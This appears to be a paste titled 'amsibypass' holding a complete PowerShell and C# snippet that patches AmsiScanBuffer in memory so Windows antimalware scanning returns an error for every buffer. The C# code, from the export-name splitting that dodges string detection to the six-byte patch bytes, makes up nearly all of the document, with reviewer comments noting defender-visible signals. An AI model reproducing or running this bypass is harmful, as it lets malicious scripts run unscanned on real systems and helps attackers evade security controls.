hollerith

amsibypass

Jan 23rd, 2021
# Reviewed copy of a PowerShell + C# snippet that tampers with AMSI in the
# current process. The code is left as found; the comments record what it does
# and what a defender can observe.
$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
)

# The C# below is compiled in-process by the Add-Type call at the bottom of the
# script; that compile step is itself a host-visible artifact (an in-memory
# assembly load in the PowerShell process).
$Source = @"
using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    /// <summary>
    /// Patches the entry of amsi.dll!AmsiScanBuffer in the calling process so the
    /// export returns immediately. Only this process's mapping of amsi.dll is
    /// touched.
    /// </summary>
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        // RtlMoveMemory is the write primitive used against amsi.dll's code pages.
        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);

        /// <summary>
        /// Overwrites the first 6 bytes of AmsiScanBuffer in this process.
        /// </summary>
        /// <returns>0 when the patch was written; 1 when amsi.dll could not be
        /// loaded, the export was not found, or VirtualProtect failed.</returns>
        public static int Disable()
        {
            // Loads amsi.dll (or returns the handle if the host already loaded it).
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero) { return 1; }

            // The export name is assembled from three pieces, so the literal
            // "AmsiScanBuffer" never appears in the script text; detection that
            // keys only on that literal will miss this. The resolved API call
            // (GetProcAddress on amsi.dll) is the more reliable signal.
            IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
            if (ASBPtr == IntPtr.Zero) { return 1; }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;

            // 0x40 = PAGE_EXECUTE_READWRITE. The previous protection is never
            // restored, so the affected page of amsi.dll's code stays writable and
            // executable afterwards — a condition memory-integrity checks can flag.
            // dwSize is 5 although 6 bytes are written below; this only works
            // because VirtualProtect changes protection at page granularity.
            if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }

            // B8 57 00 07 80 = mov eax, 0x80070057 (E_INVALIDARG); C3 = ret.
            // After the write, every AmsiScanBuffer call in this process returns
            // E_INVALIDARG without scanning the buffer.
            Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
            // Staged through an unmanaged buffer that is never released
            // (no matching Marshal.FreeHGlobal).
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
            Marshal.Copy(Patch, 0, unmanagedPointer, 6);
            MoveMemory(ASBPtr, unmanagedPointer, 6);

            return 0;
        }
    }
}
"@

# Compiles the type above into the running PowerShell process. Nothing in this
# script calls [Bypass.AMSI]::Disable(); the patch is applied only if a later
# command invokes it.
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp